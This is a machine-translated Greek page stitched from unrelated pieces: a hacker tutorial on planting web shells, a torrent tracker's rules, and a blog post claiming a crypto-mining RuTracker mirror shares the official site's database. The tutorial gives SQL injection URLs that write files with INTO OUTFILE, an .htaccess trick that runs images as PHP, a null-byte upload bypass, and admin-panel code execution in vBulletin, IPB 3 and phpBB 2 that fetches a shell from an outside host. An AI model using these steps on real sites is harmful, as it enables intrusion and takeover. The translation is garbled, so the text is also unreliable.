Γεια σας %username% και τους φίλους του. Λοιπόν, πρέπει επειγόντως να ανεβάσετε ένα κέλυφος στον ιστότοπο, καλά, ποτέ δεν ξέρετε, ίσως η τελική χρέωση εξαρτάται από αυτό. Λοιπόν, απλά δεν λειτουργεί. Εδώ συγκέντρωσα μερικά παραδείγματα (ευχαριστώ την Tracy και άλλους για αυτό).

Ας ρίξουμε το κέλυφος μέσα από την εικόνα

Έχετε παραβιάσει έναν ιστότοπο (φυσικά κάνετε μόνο δοκιμές) με έναν προσαρμοσμένο πίνακα διαχείρισης... Και δεν μπορείτε να ανεβάσετε ένα κέλυφος ιστού, αλλά υπάρχει μεταφόρτωση εικόνων και φορτώνει μόνο μορφές .jpg, .gif, .png.
Τι μπορεί να γίνει σε αυτή την περίπτωση;

Μεταφέρουμε το κέλυφος με την επέκταση .gif σε κάποιο φάκελο με εικόνες και δημιουργούμε ένα αρχείο .htaccess με τα περιεχόμενα

Εφαρμογή AddType/x-httpd-php .gif
Αυτή η εντολή θα εκτελέσει τη μορφή .gif ως php
Προσπαθώ να ανοίξω το /shell.gif

Επίσης, εάν το σενάριο δεν είναι αδιάφορο για τις αλλαγές γραμμής, προσπαθούμε να πλημμυρίσουμε το κέλυφος, μετονομάζοντάς το ταυτόχρονα σε shell.php%00.jpg, ελέγξτε τη διαθεσιμότητα του shell.php, τι θα γινόταν αν;

Μέθοδος φόρτωσης κελύφους μέσω mysql.user από το whine

1) Ας μάθουμε κάτω από ποιον καθόμαστε και ας μάθουμε επίσης τα δικαιώματά του στο mysql.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Ας μάθουμε κάτω από ποιον καθόμαστε)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" χρήστη μας "+--+
(Ας ελέγξουμε τα προνόμια του χρήστη μας. Αν δώσει σφάλμα κατά την έξοδο, μπορείτε να κάνετε δεκαεξαδικό τον χρήστη μας 0x)
3) site.com/index.php?id=-1+union+select+1,"3+from+mysql.user+into+outfile+" Διαδρομή προς το αρχείο "+--+
(Συμπληρώστε το μίνι κέλυφος)
ΥΣΤΕΡΟΓΡΑΦΟ.
Για να λειτουργήσουν όλα, πρέπει να έχετε δικαιώματα εγγραφής και να γνωρίζετε την πλήρη διαδρομή προς τη ρίζα.
Μπορείτε επίσης να ελέγξετε τα δικαιώματα εγγραφής ως εξής:

site.com/index.php?id=1+and+1=0+union+Select+1," πράβα ",3+from+mysql.user+--+
Εάν εμφανίζεται το prava, τότε έχετε δικαιώματα.

Η παρακάτω κατάσταση. Βρισκόμαστε στον πίνακα διαχείρισης της μηχανής φόρουμ vBulletin

Πάμε:
Προσθήκες και προϊόντα -> Διαχειριστής προσθηκών -> Προσθήκες και προϊόντα -> Διαχείριση προσθηκών -> [Προσθήκη νέας προσθήκης]

Επιλέξτε πρότυπα. Συνήθως επιλέγουμε faq_complete, επιλέγουμε και κάνουμε κλικ στο πλαίσιο ελέγχου Plugin is Active, το ορίζουμε σε "Yes" και αποθηκεύουμε.

localhost/forum/faq.php?cmd=phpinfo();

Αν έχουμε εκτυπώσει phpinfo() τότε σκεφτείτε το κέλυφος στα χέρια μας.

Στη συνέχεια στο phpinfo θα πρέπει να βρείτε την πλήρη διαδρομή προς το φόρουμ (για παράδειγμα /home/u0000/site.ru/www/sell.php). Στη συνέχεια, πρέπει να μετατρέψουμε το web shell μας σε αρχείο txt και να το ανεβάσουμε σε οποιονδήποτε ιστότοπο
mysite.com/shell.txt
Γεμίστε το κέλυφος με την εντολή

localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Τι κάνει αυτή η ομάδα; Αντιγράφει τα περιεχόμενα της μεταβλητής [a] στη μεταβλητή [b], δηλαδή το shell.txt αντιγράφεται στο shell.php

Φόρτωση του κελύφους στο IPB 3

Πάμε:
Υποστήριξη->Διαχείριση SQL->Διαδικασίες εκτέλεσης->Εκτέλεση νέου ερωτήματος

Κώδικας:
επιλέξτε 0x3c3f706870696e666f28293b3f3e στο αρχείο "Z:/home/site.ru/www/uploads/shell.php"
Μπορείτε να δείτε την πλήρη διαδρομή ως εξής:

Διαχειριστής->Υποστήριξη
Θα υπάρχει μια έκδοση PHP γραμμένη στο επάνω μέρος και ένας σύνδεσμος προς το PHPINFO στα αριστερά.

Shell εδώ:
http://site.com/uploads/shell.php

Μεταφόρτωση του κελύφους στο phpBB 2

1. Δημιουργήστε το αρχείο ex.sql
2. Εγγραφείτε εκεί

ΕΝΗΜΕΡΩΣΗ phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Όπου user_id=2 είναι το αναγνωριστικό διαχειριστή

3. Μεταβείτε στον πίνακα διαχείρισης
4. Στον πίνακα διαχειριστή, επιλέξτε το στοιχείο "Επαναφορά DB" και πραγματοποιήστε λήψη του ex.sql
5. Εκτελέστε τον κωδικό / Συμπληρώστε το κέλυφος έτσι

Πάμε:
http://target/profile.php?mode=editprofile&e=phpinfo();
Μετά:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
Για να εμφανίσετε το phpinfo() πρέπει να είστε συνδεδεμένοι.

Αυτή είναι απλώς μια σύντομη λίστα με το πώς και σε ποιους κινητήρες μπορεί να φορτωθεί το κέλυφος. Χρειάζομαι περισσότερο; Καλώς ήρθατε στα παιδιά στο rdot
ανέβασμα σε φόρουμ
γέμιση σε cms
Και εδώ είναι το αγαπημένο μου κέλυφος, επίσης στο rdot))

Κανόνες και περιορισμοί στον ιχνηλάτη.

1. Γενικές διατάξεις και περιορισμοί
1.1. Αυτοί οι κανόνες παρακολούθησης είναι αδιαπραγμάτευτοι και πρέπει να τηρούνται άνευ όρων από όλους όσους είναι παρόντες στον ιχνηλάτη. Μόνο οι Διαχειριστές Tracker επιτρέπεται να μην συμμορφώνονται με ορισμένες διατάξεις των κανόνων σε εξαιρετικές περιπτώσεις.
1.2. Η διαχείριση του tracker είναι η μόνη και ανώτατη αρχή στην οποία μπορούν να επιλυθούν τυχόν καταστάσεις σύγκρουσης σχετικά με τον ιχνηλάτη και τους χρήστες του. Έτσι, οι αποφάσεις των Διαχειριστών είναι τελεσίδικες και δεν υπόκεινται σε έφεση.
1.3. Η διοίκηση του Tracker διατηρεί το δικαίωμα να αλλάξει και να συμπληρώσει όλες τις ρήτρες αυτών των κανόνων χωρίς προηγούμενη ή μεταγενέστερη ειδοποίηση. Οι προσθήκες και οι αλλαγές στους κανόνες τίθενται σε ισχύ από τη στιγμή της δημοσίευσής τους. Ωστόσο, ως πράξη καλής θέλησης, η Διοίκηση θα προσπαθήσει, όποτε είναι δυνατόν, να γνωστοποιήσει στους χρήστες τέτοιες αλλαγές.
1.4. Η άγνοια αυτών και άλλων Κανόνων Tracker όχι μόνο δεν απαλλάσσει κάποιον από την ευθύνη για παράβαση τους, αλλά αποτελεί από μόνη της παραβίαση και επιβαρυντική περίσταση.
1.5. Απαγορεύεται η χρήση οποιωνδήποτε προγραμμάτων για την παραποίηση δεδομένων σχετικά με τη Μεταφόρτωση και τη Λήψη σας. Οι απατεώνες απαγορεύονται αμέσως.
1.7. Απαγορεύεται η χρήση σφαλμάτων και σφαλμάτων παρακολούθησης για προσωπικούς σκοπούς. Σε περίπτωση εντοπισμού δυσλειτουργιών και σφαλμάτων, θα πρέπει να ενημερώσετε τη Διοίκηση Tracker.
2. Εγγραφή
Η εγγραφή είναι αναπόσπαστο μέρος της παρουσίας στον ιχνηλάτη. Η εγγραφή υποδηλώνει αυτόματα τη συμφωνία σας με αυτούς τους Κανόνες. Εάν δεν συμφωνείτε με αυτούς τους Κανόνες, γράψτε στη διοίκηση.
2.1. ΑΠΑΓΟΡΕΥΕΤΑΙ ΕΓΓΡΑΦΗ ΑΠΟ ΔΙΑΦΟΡΟΥΣ ΞΕΝΟΥΣ PROXY SERVER. Παραβάτες - άμεση απαγόρευση!!!
Σε εξαιρετικές περιπτώσεις επιτρέπεται μόνο μετά από εξέταση της αίτησης από τη διοίκηση.
2.2. ΑΠΑΓΟΡΕΥΕΤΑΙ Η ΕΓΓΡΑΦΗ ΠΕΡΙΣΣΟΤΕΡΩΝ ΑΠΟ ΔΥΟ ΛΟΓΑΡΙΑΣΜΩΝ ΑΠΟ ΕΝΑ ΥΠΟΛΟΓΙΣΤΗ. Σε περίπτωση παράβασης, όλοι οι υπάρχοντες λογαριασμοί απαγορεύονται.
Η εγγραφή νέου λογαριασμού μετά τους δύο υπάρχοντες είναι δυνατή μόνο με τη συγκατάθεση της διοίκησης.
3. Κανόνες για τον σχολιασμό των χεριών
3.1. Απαγορεύεται η χρήση βωμολοχιών σε σχόλια σε διανομές, άσεμνες λέξεις και εκφράσεις, καλυμμένες αισχρότητες, συμπεριλαμβανομένων των ξένων γλωσσών.
Τιμωρία: Κατάργηση σχολίων που παραβιάζουν κανόνες και απαγόρευση γραφής σχολίων για περίοδο 1 εβδομάδας. Μεταγενέστερη παραβίαση αυτού του κανόνα θα έχει ως αποτέλεσμα την απαγόρευση για περίοδο 7 ημερών και την απαγόρευση εγγραφής σχολίων για περίοδο 14 ημερών. Στο μέλλον, θα υπάρχει μόνιμη απαγόρευση γραφής σχολίων.
3.2. Απαγορεύεται η προσβολή των συμμετεχόντων στο tracker με οποιαδήποτε μορφή. Απαγορεύεται η εμφάνιση οποιασδήποτε αγένειας, προσωπικών προσβολών και άσεμνων δηλώσεων προς άλλους συμμετέχοντες, που βλάπτουν τη φήμη τους, ταπεινώνουν την τιμή και την αξιοπρέπειά τους, συμπεριλαμβανομένης της δημόσιας επίδειξης προσωπικών σχέσεων, τόσο σε προσωπικά μηνύματα στον ιχνηλάτη όσο και σε σχόλια σε διανομές. Οι συμμετέχοντες πρέπει να διατηρούν επικοινωνία με σεβασμό.
Τιμωρία: Κατάργηση παραβατικών σχολίων και αποκλεισμός του παραβάτη για περίοδο 7 ημερών. Μεταγενέστερη παραβίαση αυτού του κανόνα θα οδηγήσει σε απαγόρευση για 7 ημέρες και απαγόρευση γραφής σχολίων για 30 ημέρες. Στο μέλλον, θα υπάρχει μόνιμη απαγόρευση γραφής σχολίων.
3.3. Απαγορεύονται οι απειλές οποιασδήποτε φύσης (εικονικές, πραγματικές και άλλες απειλές κατά των συμμετεχόντων στο πρόγραμμα παρακολούθησης).
Τιμωρία: Διαγραφή μηνυμάτων και αποκλεισμός του παραβάτη για 14 ημέρες. Εάν αυτός ο κανόνας παραβιαστεί ξανά, θα αποκλειστείτε για ένα μήνα.
3.4. Flaming (μηνύματα που είναι εκτός θέματος, με σκοπό την έναρξη διαφωνίας, καθώς και εξατομίκευση αυτών που συζητούν), πλημμυρικά (μηνύματα που δεν ανταποκρίνονται στο θέμα, δεν φέρουν σημασιολογικό φορτίο ή αποτελούνται μόνο από emoticons), offtopic (μηνύματα που δεν σχετίζονται με το υπό συζήτηση θέμα) απαγορεύονται , καθώς και κίνητρα για πλημμύρα, φλόγα, offtopic και μηνύματα όπως: "Βοήθεια", "Πρόβλημα", "Τι λες, ε;" ή "Ώστε δεν καταλαβαίνω - από πού να κάνω λήψη;" και τα παρόμοια, που δεν σχετίζονται με αυτή τη διανομή. Ένα σχόλιο δεν μπορεί να περιέχει περισσότερα από 3 emoticon.
Τιμωρία: Αφαίρεση σχολίων που παραβιάζουν τους κανόνες και προειδοποίηση του συντάκτη του σχολίου για περίοδο 3 ημερών. Εάν αυτός ο κανόνας παραβιαστεί ξανά, ο συντάκτης του σχολίου θα αποκλειστεί από τη σύνταξη σχολίων για περίοδο 7 ημερών. Μελλοντικά, για κάθε παράβαση, εκδίδεται απαγόρευση σχολίων για περίοδο 14 ημερών και απαγόρευση λήψης για περίοδο 14 ημερών.
3.5. Απαγορεύεται η δημοσίευση εμπορικών μηνυμάτων, άμεσης ή έμμεσης διαφήμισης, ανεπιθύμητης αλληλογραφίας και συνδέσμων σε ιστότοπους που δεν σχετίζονται άμεσα με τη διανομή στα σχόλια.
Τιμωρία: Αφαίρεση διαφήμισης, απαγόρευση γραφής σχολίων για περίοδο 7 ημερών και απαγόρευση λήψης για περίοδο 7 ημερών. Σε περίπτωση επανειλημμένης παράβασης, απαγόρευση γραφής σχολίων για περίοδο 15 ημερών και απαγόρευση λήψης για περίοδο 15 ημερών. Στο μέλλον θα υπάρχει μόνιμη απαγόρευση γραφής σχολίων.
3.6. Απαγορεύεται στα σχόλια η επίδειξη φυλετικής, εθνικής και θρησκευτικής εχθρότητας, η ταραχή πολιτικών κομμάτων, η προώθηση της τρομοκρατίας, του εξτρεμισμού, των ναρκωτικών, της θρησκείας και άλλων θεμάτων που δεν συνάδουν με τους γενικά αποδεκτούς νόμους ηθικής και ευπρέπειας.
Τιμωρία: Αφαίρεση σχολίων που παραβιάζουν τους κανόνες, απαγόρευση γραφής σχολίων για περίοδο 14 ημερών και απαγόρευση λήψης για περίοδο 14 ημερών. Σε περίπτωση επανειλημμένης παράβασης, απαγόρευση γραφής σχολίων για περίοδο 30 ημερών και απαγόρευση λήψης για περίοδο 30 ημερών. Στο μέλλον θα υπάρχει μόνιμη απαγόρευση γραφής σχολίων.
3.7. Απαγορεύεται να αφήνετε σχόλια που παραβιάζουν ανοιχτά ή κρυφά τον Ποινικό Κώδικα της Ρωσικής Ομοσπονδίας, καθώς και μηνύματα που ζητούν τη διάπραξη παράνομων ενεργειών.
Τιμωρία: Διαγραφή μηνυμάτων, απαγόρευση γραφής σχολίων για περίοδο 14 ημερών και απαγόρευση λήψης για περίοδο 14 ημερών. Σε περίπτωση επανειλημμένης παράβασης, ο παραβάτης τιμωρείται με αποκλεισμό για περίοδο 30 ημερών. Για την τρίτη παράβαση - μόνιμη απαγόρευση.
3.8. Απαγορεύεται στα σχόλια σε διανομές η αποκάλυψη προσωπικών δεδομένων χρηστών, εμπιστευτικών δεδομένων, πραγματικών ονομάτων, δημοσίευσης φωτογραφιών, διάδοσης πληροφοριών για την ιδιωτική ζωή ενός συμμετέχοντος στη συζήτηση που αποτελούν προσωπικό ή οικογενειακό του μυστικό, χωρίς τη συγκατάθεσή του.
Τιμωρία: Αφαίρεση σχολίων που παραβιάζουν τον κανόνα και προφορική προειδοποίηση στον ιχνηλάτη. Σε περίπτωση επανειλημμένης παράβασης, απαγόρευση γραφής σχολίων για περίοδο 7 ημερών. Στο μέλλον θα υπάρξει απαγόρευση γραφής σχολίων για περίοδο 30 ημερών.
3.9. Απαγορεύεται η δημοσίευση στα σχόλια εικόνων που περιέχουν πορνογραφία, σκηνές βίας ή οποιεσδήποτε άλλες εικόνες που εξευτελίζουν ή προσβάλλουν άλλους χρήστες.
Τιμωρία: Διαγραφή σχολίων που παραβιάζουν τους κανόνες και απαγόρευση λήψης και δημοσίευσης σχολίων για περίοδο 7 ημερών. Σε περίπτωση επανειλημμένης παραβίασης, ο χρήστης αποκλείεται για περίοδο 7 ημερών. Στο μέλλον - απαγόρευση για περίοδο 15 ημερών και μόνιμη απαγόρευση γραφής σχολίων.
3.10. Απαγορεύεται η χρήση άλλης γλώσσας εκτός της Ρωσικής και γραμματοσειράς άλλης από την Κυριλλική στα σχόλια.
Τιμωρία: Διαγραφή μηνυμάτων και προφορική προειδοποίηση προς τον χρήστη σε περίπτωση επανειλημμένης παραβίασης των κανόνων αυτής της παραγράφου, απαγόρευση γραφής σχολίων για περίοδο 3 ημερών.
3.11. Απαγορεύεται η χρήση των ακόλουθων μεθόδων επισήμανσης στα μηνύματα: κόκκινο, πάνω από 75% κεφαλαία γράμματα και μεγάλο μέγεθος γραμματοσειράς - αυτό είναι το προνόμιο των συντονιστών και των διαχειριστών.
Τιμωρία: Διαγραφή μηνυμάτων και προφορική προειδοποίηση προς τον χρήστη σε περίπτωση επανειλημμένης παραβίασης των κανόνων αυτής της παραγράφου, απαγόρευση γραφής σχολίων για περίοδο 7 ημερών.
3.12. Η υπερπροσφορά απαγορεύεται (αναφορά μηνυμάτων από άλλους συμμετέχοντες σε ποσότητες που υπερβαίνουν τα λογικά ποσά (περισσότερες από 10 γραμμές του αρχικού μηνύματος)).
Τιμωρία: Επεξεργασία του μηνύματος και προφορική προειδοποίηση του χρήστη σε περίπτωση επανειλημμένης παραβίασης των κανόνων αυτής της παραγράφου, απαγόρευση γραφής σχολίων για περίοδο 3 ημερών.
3.13. Τα spoiler απαγορεύονται και αποφύγετε τη χρήση spoilers (αποκάλυψη βασικών σημείων πλοκής, η γνώση των οποίων θα μπορούσε να καταστρέψει την εμπειρία θέασης για άλλους, το αποτέλεσμα του αγώνα κ.λπ.).
Εάν δεν μπορείτε να κάνετε χωρίς spoiler, τότε πρέπει να συμπεριλάβετε το spoiler στην ετικέτα [expand] και να βάλετε το σημάδι "Spoiler" μπροστά του.
Σημείωση: Σε «αθλητικές» διανομές απαγορεύεται το spoil έως και 11 σχολίων (1 σελίδα).
Τιμωρία: Επεξεργασία του μηνύματος και προφορική προειδοποίηση του χρήστη. Εάν παραβιάζετε επανειλημμένα τους κανόνες αυτής της παραγράφου, θα σας απαγορεύεται να γράφετε σχόλια για περίοδο 3 ημερών.
3.14. Απαγορεύεται η δημοσίευση μηνυμάτων που περιέχουν εσκεμμένα ψευδείς πληροφορίες.
Τιμωρία: Αφαίρεση σχολίων που παραβιάζουν κανόνες και προφορική προειδοποίηση προς τον χρήστη. Εάν παραβιάζετε επανειλημμένα τους κανόνες αυτής της παραγράφου, θα σας απαγορεύεται να αφήνετε σχόλια για περίοδο 7 ημερών.
Το σύστημα σχολίων torrent έχει σχεδιαστεί για:
- Εκφράστε το σεβασμό και την ευγνωμοσύνη σας στον δότη,
- Κάντε μια συγκεκριμένη ερώτηση που σας ενδιαφέρει σχετικά με τη διανομή,
- Παρέχετε ενδιαφέρουσες πληροφορίες σχετικά με το δώρο.
4. Περιορισμοί στα avatar και στις υπογραφές:
4.1. Υπογραφή:
- Μέγιστο ύψος: 100 πόντους (με άλλα λόγια, όχι περισσότερες από τέσσερις γραμμές χρήστη ή δέκα γραμμές κειμένου (μέγεθος γραμματοσειράς 10), πλάτος: 750 πόντους.
- Το συνολικό βάρος των εικόνων που περιέχονται στην υπογραφή δεν πρέπει να υπερβαίνει τα 200 Kb.
- Περιεχόμενο: βία, απειλές (σε δημογραφική, εθνική, θρησκευτική ή πολιτική βάση), βωμολοχίες (βωμολοχίες, αυθάδεια, αγένεια κ.λπ.), ακολασία (πορνογραφία), διακρίσεις σε οποιαδήποτε μορφή, κείμενα και εικόνες διαφήμισης ή εμπορικοί είναι απαράδεκτος χαρακτήρας, μίμηση τίτλων/βαθμών αυτού του πόρου, καθώς και προκλητικές εικόνες, π.χ. χρησιμοποιώντας ναζιστικά σύμβολα.
- Κινούμενα σχέδια: οι λεζάντες που αναβοσβήνουν έντονα απαγορεύονται (ο βαθμός αναβοσβήνει καθορίζεται από τη διοίκηση).
- Η υπογραφή κάτω από τα μηνύματά σας δεν μπορεί να χρησιμοποιηθεί για τη δημιουργία συνδέσμων σε πόρους δικτύου. (εξαιρούνται οι σύνδεσμοι σε ιστότοπους με γραμμές χρηστών, υπηρεσίες όπως το youtube, το google κ.λπ.)
4.2. Avatar:
- Μέγιστο μέγεθος: 100x100 pixel. βάρος: έως 21 KB.
- Περιεχόμενο: βία, απειλές (σε δημογραφική, εθνική, θρησκευτική ή πολιτική βάση), βωμολοχίες (βωμολοχίες, αυθάδεια, αγένεια, κ.λπ.), ακολασία (πορνογραφία), διακρίσεις σε οποιαδήποτε μορφή, προπαγάνδα ναρκωτικών, εμπορική διαφήμιση και διαφημιστικά κείμενα, απομίμηση τίτλων/βαθμών αυτού του πόρου, εσκεμμένη ομοιότητα με avatar μελών της διοίκησης, καθώς και προκλητικές εικόνες, π. χρησιμοποιώντας ναζιστικά σύμβολα.
- Κινούμενα σχέδια: τα άβαταρ που αναβοσβήνουν έντονα απαγορεύονται (ο βαθμός αναβοσβήνει καθορίζεται από τη διοίκηση).
Τιμωρία: Αφαίρεση υπογραφής και avatar, ή απαγόρευση χρήσης τους (καθορίζεται από τον διαχειριστή).
5. Απελευθερώσεις
5.1. Απαγορεύεται η εκ νέου μεταφόρτωση κυκλοφοριών σε άλλους ιχνηλάτες χωρίς την προσωπική άδεια του εκδότη. Η υποστήριξη της διανομής μιας κυκλοφορίας που απαγορεύεται να μεταφορτωθεί εκ νέου σε άλλο πρόγραμμα παρακολούθησης ισοδυναμεί με ανεξάρτητη εκ νέου μεταφόρτωση και τιμωρείται σύμφωνα με την ρήτρα 7.
6. Άλλο
6.1. Απαγορεύεται η μεταφόρτωση των περιεχομένων των διανομών χρησιμοποιώντας υπηρεσίες φιλοξενίας αρχείων όπως vip-file, letitbit και άλλες...
6.2. Απαγορεύεται η χρήση οποιουδήποτε διαχειριστή λήψης για λήψη torrent.
7. Τιμωρία:
Για παραβάσεις που καθορίζονται στις παραγράφους 5-6 - απαγόρευση για 7 ημέρες. Η επανειλημμένη παραβίαση αυτών των κανόνων θα οδηγήσει σε ισόβια απαγόρευση.

Έγραψα ότι όταν προσπαθείτε να συνδεθείτε σε έναν από τους καθρέφτες RuTracker, λαμβάνετε ένα μήνυμα που δηλώνει ότι αυτό είναι δυνατό μόνο εάν επιτρέψετε στον ιστότοπο να εκτελεί υπολογισμούς στον υπολογιστή σας, με άλλα λόγια, να εξορύξει κρυπτονομίσματα.

Μετά από αυτό, έλαβα θυμωμένα μηνύματα στα σχόλια ότι ήμουν πραγματικά ανόητος και ότι οι καθρέφτες που περιέγραψα δεν ανήκαν στο root tracker και δεν συνδέονταν σε καμία περίπτωση με το ίδιο το root tracker. Δεν έδωσα μεγάλη σημασία σε αυτό και στα σχόλια σε εκείνο το σημείωμα έκανα την ερώτηση, αλλά τι γίνεται με το γεγονός ότι ο καθρέφτης rutracker-org.appspot.comεπαναλαμβάνει όχι μόνο το σχέδιο της επίσημης ιστοσελίδας του rutracker rutracker.org, αλλά και επαναλαμβάνει πλήρως το περιεχόμενό του. Ωστόσο, ως απάντηση σε αυτό άκουσα ότι, παραθέτω: " Είσαι ανόητος Volokh και δεν καταλαβαίνεις τίποτα".

Όπως αρμόζει σε έναν υγιή άνθρωπο, αρχίζει να σκέφτεται τα εξής: Αν μου πουν ότι είμαι ανόητος, τότε ίσως είναι αλήθεια;Το σκέφτηκα κι εγώ, αλλά αποδείχθηκε ότι όχι - σε αυτήν την κατάσταση δεν είμαι ανόητος. Πρώτα όμως πρώτα.

Αφού οι διαχειριστές του RuTracker άρχισαν να λένε στα σχόλια ότι:

Δεν έχουμε άλλους καθρέφτες ή «παιδικά έργα»! Όλοι οι άλλοι «κλώνοι» του root tracker που αντιγράφουν τη δομή και το σχέδιό μας δεν έχουν καμία σχέση με εμάς, η χρήση τους μπορεί να οδηγήσει σε κλοπή κωδικών πρόσβασης, χρήση του υπολογιστή σας για εξόρυξη κρυπτονομισμάτων και άλλα προβλήματα! Ψεύτικος είναι και ο Maintracker!!

Άρχισα να σκέφτομαι, ίσως πραγματικά παρασύρθηκα και μάταια συκοφάντησα τα παιδιά από το RuTracker. Εντάξει, αποφάσισα να συγκρίνω σχόλια από τον επίσημο ιστότοπο του RuTracker - rutracker.orgκαι σχόλια από το rutracker mirror rutracker-org.appspot.com, το οποίο ζήτησε άδεια για τη δημιουργία κρυπτονομισμάτων. Αποδείχθηκε ότι τα σχόλια είναι εντελώς πανομοιότυπα. Αλλά κανείς δεν θα με πιστέψει, αποφάσισα, και ήθελα να τραβήξω στιγμιότυπα οθόνης. Αλλά και αυτή η ιδέα φαινόταν ανόητη, γιατί... Τα σχόλια μπορούν εύκολα να διαγραφούν και να επεξεργαστούν.

Η καλύτερη ιδέα ήταν να ηχογραφήσετε ένα βίντεο. Ας ρίξουμε μια ματιά και μετά θα σχολιάσω τι συμβαίνει εδώ:

Κοίταξες; Θα πω αμέσως ότι παρουσιάζω το βίντεο "όπως είναι", δηλαδή χωρίς επεξεργασία. Ως εκ τούτου, είναι χωρίς σχόλια ή φωνή. Ας καταλάβουμε λοιπόν τι συμβαίνει εδώ.

Αρχικά, δημιούργησα ένα γραμματοκιβώτιο για εγγραφή στον ιστότοπο rutracker-org.appspot.com. Ναι, ακριβώς στον ιστότοπο που εξορύσσει κρυπτονομίσματα. Γιατί σε αυτό και όχι στην επίσημη ιστοσελίδα; rutracker.org? Το γεγονός είναι ότι ήμουν αντιμέτωπος με το καθήκον να δείξω τι οι ιστότοποι rutracker-org.appspot.comΚαι rutracker.orgμία βάση δεδομένων, δηλαδή, αυτοί οι ιστότοποι είναι διασυνδεδεμένοι, σε αντίθεση με τις δηλώσεις των διαχειριστών του root tracker.

Αφού άνοιξα το email μου, άνοιξα το πρόγραμμα περιήγησης Tor και φόρτωσα τρεις καρτέλες:

1. Επίσημος ιστότοπος rutracker.org;

2. Mirror RuTracker rutracker-org.appspot.com;

3. Καρτέλα με ανοιχτό γραμματοκιβώτιο.

Μετά από αυτό, στον καθρέφτη RuTracker rutracker-org.appspot.comΈκανα εγγραφή (Ώρα 00:25) και έφτασε στο γραμματοκιβώτιό μου ένα email ενεργοποίησης λογαριασμού (Ώρα 00:57). Και εδώ αρχίζουν ενδιαφέροντες χοροί, ή μάλλον ανατριχιαστικοί χοροί με τα άκρα των διαχειριστών του ιστότοπου να καίγονται: ο κωδικός ενεργοποίησης περιέχει έναν σύνδεσμο προς τον επίσημο ιστότοπο του tracker (Ώρα 1:00):

https://rutracker.org/forum/profile.php?mode=activate&u=43055955&act_key=nUMiXqWX19EF

Αυτός ο σύνδεσμος λειτουργεί και οδηγεί απευθείας στον επίσημο ιστότοπο rutracker.org. Κάνοντας κλικ στον σύνδεσμο, ο λογαριασμός που δημιουργήθηκε στον καθρέφτη rutracker-org.appspot.comενεργοποιήθηκε με επιτυχία στον επίσημο ιστότοπο rutracker.org(Ώρα 1:06). Στα θαύματα της τεχνολογίας και στις θαυματουργές σκέψεις του διαχειριστή. Φαίνεται ότι κάτι αρχίζει να καπνίζει για τους διαχειριστές του ιστότοπου. Λοιπόν, εντάξει, είμαι ανόητος, όπως είπαν, τι να μου πάρει. Προχώρα.

Μετά την επιτυχή ενεργοποίηση του λογαριασμού μου, πηγαίνω στο mirror rutracker-org.appspot.comκαι προσπαθήστε να συνδεθείτε στον ιστότοπο (Ώρα 1:45). Αφού εισαγάγω το captcha, συνδέομαι με επιτυχία χρησιμοποιώντας τον λογαριασμό που δημιούργησα στον «ανεπίσημο» tracker (Ώρα 2:03). Και αυτή τη στιγμή εμφανίζεται η ίδια ειδοποίηση (Ώρα 2:07):

Κάνω κλικ στο κουμπί "Allow" (Ώρα 2:08) γιατί διαφορετικά δεν θα μπορούσα να συνδεθώ. Μετά από αυτό, δείχνω ότι ο προσωπικός λογαριασμός είναι κενός και δεν έχω αφήσει ακόμη σχόλια (Ώρα 2:20).

Τώρα, για να δείξω τη σχέση μεταξύ του mirror και της επίσημης ιστοσελίδας, επιλέγω μια τυχαία διανομή στον ιστότοπο rutracker-org.appspot.comκαι αφήστε ένα σχόλιο (Ώρα 3:10). Μετά από αυτό, στην επίσημη ιστοσελίδα rutracker.orgΠροσπαθώ να συνδεθώ (Ώρα 3:40) με έναν λογαριασμό που δημιουργήθηκε στον καθρέφτη του root tracker. Και ιδού, το login και ο κωδικός πρόσβασης από τον «ανεπίσημο» καθρέφτη εμφανίστηκαν στον επίσημο ιστότοπο (Ώρα 4:00). Σύμπτωση; Μη νομίζεις.

Ας πάμε παρακάτω, ανοίξτε τη λίστα των μηνυμάτων που έχουν απομείνει στον ιχνηλάτη και τι βλέπουμε: μια γνωστή διανομή στη λίστα των θεμάτων (Ώρα 4:05). Μάλλον και σύμπτωση, και για μεγαλύτερη πειστικότητα ανοίγω το σχόλιο που άφησα σε αυτή τη διανομή σε έναν καθρέφτη που δεν αναγνωρίζεται από τους διαχειριστές (Ώρα 4:17).

Σύγκριση του σχολίου με τη διανομή από τον ιστότοπο rutracker-org.appspot.comΚαι rutracker.org(Ώρα 5.54) και για άλλη μια φορά είμαστε πεπεισμένοι ότι αυτές οι δύο τοποθεσίες είναι αλληλένδετες.

Τι μου έγραψαν οι διαχειριστές του ιστότοπου; Φαίνεται ότι με έπεισαν ότι η επίσημη ιστοσελίδα και καθρέφτης rutracker-org.appspot.comδεν συνδέονται με κανέναν τρόπο. Τα σχόλια των διαχειριστών του tracker δηλώνουν ξεκάθαρα ότι όλοι οι καθρέφτες απλώς αντιγράφουν τη δομή και το σχεδιασμό του ιστότοπου, αλλά δεν συνδέονται μεταξύ τους. Ωστόσο, από ότι είδαμε, αποδεικνύεται ότι η επίσημη ιστοσελίδα αντιγράφει σχόλια από κάποιον αριστερό καθρέφτη; Όχι, είναι και αυτό ανοησία. Πού είναι η αλήθεια; Η αλήθεια είναι ότι αυτοί οι δύο ιστότοποι έχουν μία βάση δεδομένων και υπάρχουν πολλά mirrors, μερικά από τα οποία αναγνωρίζονται από τους διαχειριστές του tracker, ενώ άλλα δεν αναγνωρίζονται και χρησιμοποιούνται για τη δημιουργία κρυπτονομισμάτων.

Αποδεικνύεται ότι όλο αυτό το διάστημα, στα σχόλια προσπαθούσαν να ρίξουν μερικές ανοησίες στα αυτιά μου και να με πείσουν ότι δήθεν πήγα σε εντελώς λάθος ιστότοπο, αλλά στην πραγματικότητα αποδείχθηκε ότι και αυτός ο ιστότοπος ανήκει στο RuTracker.

